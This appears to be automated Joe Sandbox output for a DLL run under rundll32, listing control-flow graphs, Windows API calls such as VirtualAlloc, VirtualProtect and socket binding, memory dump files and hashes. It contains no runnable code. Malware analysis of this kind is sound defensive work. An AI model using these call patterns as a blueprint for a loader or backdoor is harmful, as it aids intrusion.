                                                                                                          control_flow_graph 140 10003440-1000344d 141 10003454-10003462 140->141 142 1000344f call 100033f0 140->142 144 10003464-10003466 141->144 145 1000346b-10003486 141->145 142->141 146 10003699-1000369c 144->146 147 10003495-100034a2 145->147 148 10003488-10003493 145->148 149 100034b1-100034b7 call 1002e654 147->149 150 100034a4-100034af 147->150 148->147 152 100034bc-100034c6 149->152 150->149 153 100034c8-100034ca 152->153 154 100034cf-100034d6 152->154 153->146 155 100034dd-100034e3 154->155 156 10003696 155->156 157 100034e9-100034f5 155->157 156->146 158 100034f7-10003509 157->158 159 1000350b-10003527 157->159 160 1000352a-1000353c 158->160 159->160 161 10003552-1000356d 160->161 162 1000353e-10003550 160->162 163 10003570-10003582 161->163 162->163 164 10003584-10003596 163->164 165 10003598-100035b4 163->165 166 100035b7-100035c9 164->166 165->166 167 100035cb-100035dd 166->167 168 100035df-100035fb 166->168 169 100035fe-10003628 167->169 168->169 170 10003647-1000364f 169->170 171 1000362a-10003644 169->171 172 10003651-1000366b 170->172 173 1000366e-10003676 170->173 171->170 172->173 174 10003691 173->174 175 10003678-1000368e 173->175 174->155 175->174
                                                                                                          APIs
                                                                                                            • Part of subcall function 100033F0: _malloc.LIBCMT ref: 100033F9
                                                                                                          • _malloc.LIBCMT ref: 100034B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID: +';
                                                                                                          • API String ID: 1579825452-2694261586
                                                                                                          • Opcode ID: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                                                                                                          • Instruction ID: 6db3f6523064f320fd84e53d4013fc8a18f56f5699846b59c9fd9a4c566afa3d
                                                                                                          • Opcode Fuzzy Hash: 03de1ce98db81d32a198f84050ea0a9e1233ff5b21d79efe49771c2647b1339e
                                                                                                          • Instruction Fuzzy Hash: B891E770E04649AFDB09CF98C490AAEBBB2FF85345F24C199D915AB359C335AA90CF44
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 176 10002690-100026a0 177 100026a2-100026a7 176->177 178 100026ac-100026b8 176->178 179 100027ac-100027af 177->179 180 10002714-10002776 178->180 181 100026ba-100026c5 178->181 184 10002784-100027a1 VirtualProtect 180->184 185 10002778-10002781 180->185 182 100026c7-100026ce 181->182 183 1000270a-1000270f 181->183 186 100026d0-100026de 182->186 187 100026f2-10002704 VirtualFree 182->187 183->179 188 100027a3-100027a5 184->188 189 100027a7 184->189 185->184 186->187 190 100026e0-100026f0 186->190 187->183 188->179 189->179 190->183 190->187
                                                                                                          APIs
                                                                                                          • VirtualFree.KERNELBASE(00000000,?,00004000,?,10002928,00000001,00000000,?,100030A8,?,?,?,?,100030A8,00000000,00000000), ref: 10002704
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 1263568516-0
                                                                                                          • Opcode ID: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction ID: e47a27f64338b3e84d430cb899d867ed3d67d72a97b2c0655aeaec8263a425f7
                                                                                                          • Opcode Fuzzy Hash: 3c4ab6a1de08e5656c1cdd8e190091452f899426c6fe537940d40abfc070cfe1
                                                                                                          • Instruction Fuzzy Hash: 8841B77461410AAFEB48CF58C490BA9B7B2FB88364F14C659EC1A9F355C731EE41CB84
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 191 100024d0-100024fe 192 10002512-1000251e 191->192 193 10002524-1000252b 192->193 194 10002616 192->194 196 10002593-100025ae call 100024a0 193->196 197 1000252d-1000253a 193->197 195 1000261b-1000261e 194->195 206 100025b0-100025b2 196->206 207 100025b4-100025d9 VirtualAlloc 196->207 199 1000253c-1000255e VirtualAlloc 197->199 200 1000258e 197->200 201 10002560-10002562 199->201 202 10002567-1000258b call 100022d0 199->202 200->192 201->195 202->200 206->195 209 100025db-100025dd 207->209 210 100025df-1000260e call 10002320 207->210 209->195 210->194
                                                                                                          APIs
                                                                                                          • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000303F,00000000), ref: 10002551
                                                                                                          • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,1001DF0A,8B118BBC,?,1000303F,00000000,1001DF0A,?), ref: 100025CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                                                                                                          • Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
                                                                                                          • Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                                                                                                          • Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10024BD7
                                                                                                            • Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F
                                                                                                            • Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66
                                                                                                            • Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1104862767-0
                                                                                                          • Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                                                                                                          • Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
                                                                                                          • Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                                                                                                          • Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 246 1001fb60-1001fba1 call 100236ce 248 1001fba3-1001fbaa 246->248 249 1001fbb1-1001fbb7 248->249 250 1001fbac call 1001fb50 248->250 252 1001fbc1-1001fbc4 249->252 253 1001fbb9-1001fbbf 249->253 250->249 254 1001fbc7-1001fc07 call 1002e804 252->254 253->254 257 1001fc09-1001fc19 254->257 258 1001fc1e-1001fc2c 254->258 257->258
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2001391462-0
                                                                                                          • Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
                                                                                                          • Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
                                                                                                          • Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
                                                                                                          • Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 260 1002b0bb-1002b0d3 call 10030535 263 1002b0d5 call 10023b5b 260->263 264 1002b0da-1002b0dd 260->264 263->264 266 1002b115-1002b126 call 1002ac8f 264->266 267 1002b0df-1002b0e7 264->267 276 1002b13b-1002b142 call 1003060d 266->276 277 1002b128-1002b136 call 1002af6b 266->277 269 1002b10a call 1002adac 267->269 270 1002b0e9-1002b108 call 1002aec4 267->270 275 1002b10f-1002b113 269->275 270->263 270->269 275->263 275->266 277->276
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 1002B0C2
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8H_prolog3Throw
                                                                                                          • String ID:
                                                                                                          • API String ID: 3670251406-0
                                                                                                          • Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
                                                                                                          • Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
                                                                                                          • Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
                                                                                                          • Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 282 10008000-1000801a call 1002e654 285 10008023-10008037 282->285 286 1000801c-10008021 282->286 288 1000804b-10008052 285->288 287 1000807b-1000807e 286->287 289 10008054-1000805c 288->289 290 1000805e-10008062 call 1002e577 288->290 289->288 293 10008067-10008070 290->293 294 10008072-10008074 293->294 295 10008076 293->295 294->287 295->287
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 1000800B
                                                                                                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                                                                                                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                                                                                                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 501242067-0
                                                                                                          • Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
                                                                                                          • Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
                                                                                                          • Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
                                                                                                          • Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 296 100236ce-100236dc 297 100236e2-100236ed call 1002e654 296->297 298 100236de-100236e0 296->298 301 100236f2-100236f5 297->301 299 10023707-1002370a 298->299 301->298 302 100236f7-10023704 301->302 302->299
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1579825452-0
                                                                                                          • Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
                                                                                                          • Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
                                                                                                          • Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
                                                                                                          • Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 303 1002acfb-1002ad0d call 10030568 306 1002ad30-1002ad37 call 1003060d 303->306 307 1002ad0f-1002ad1e call 1002a6ab 303->307 312 1002ad20 call 10024d0b 307->312 313 1002ad25-1002ad2b call 1002a71d 307->313 315 1002ad23 312->315 313->306 315->313
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002AD02
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 1641187343-0
                                                                                                          • Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
                                                                                                          • Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
                                                                                                          • Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
                                                                                                          • Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 317 10035645-10035667 HeapCreate 318 1003566b-10035674 317->318 319 10035669-1003566a 317->319
                                                                                                          APIs
                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 10892065-0
                                                                                                          • Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
                                                                                                          • Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
                                                                                                          • Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
                                                                                                          • Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___getlocaleinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1937885557-0
                                                                                                          • Opcode ID: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
                                                                                                          • Instruction ID: b04c4d7f6a57d8df90e79b3f21b47685716bac7d418787b81275d3872e324d7c
                                                                                                          • Opcode Fuzzy Hash: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
                                                                                                          • Instruction Fuzzy Hash: 0DE1DDB294060DBEEF12CAE1CC85DFFB7BDFB04744F14096AB255E6041EA71AB059B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • WSAStartup.WS2_32(?,?), ref: 10001194
                                                                                                          • _memset.LIBCMT ref: 100011A8
                                                                                                          • htonl.WS2_32(00000000), ref: 100011C1
                                                                                                          • htons.WS2_32(?), ref: 100011D5
                                                                                                          • socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
                                                                                                          • bind.WS2_32(?,?,00000010), ref: 10001210
                                                                                                          • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670161765.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670167725.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1003240404-0
                                                                                                          • Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
                                                                                                          • Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
                                                                                                          • Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
                                                                                                          • Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • IsIconic.USER32 ref: 1001DFE3
                                                                                                            • Part of subcall function 10024266: __EH_prolog3.LIBCMT ref: 1002426D
                                                                                                            • Part of subcall function 10024266: BeginPaint.USER32(?,?,00000004,10022D30,?,00000058,1001E0C9), ref: 10024299
                                                                                                          • SendMessageA.USER32 ref: 1001E031
                                                                                                          • GetSystemMetrics.USER32 ref: 1001E039
                                                                                                          • GetSystemMetrics.USER32 ref: 1001E044
                                                                                                          • GetClientRect.USER32 ref: 1001E05B
                                                                                                          • DrawIcon.USER32 ref: 1001E0AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000003.00000002.670076551.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000003.00000002.670069737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670118266.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670127496.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670132358.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000003.00000002.670156279.0000000010084000.00000004.00020000.sdmp Download File
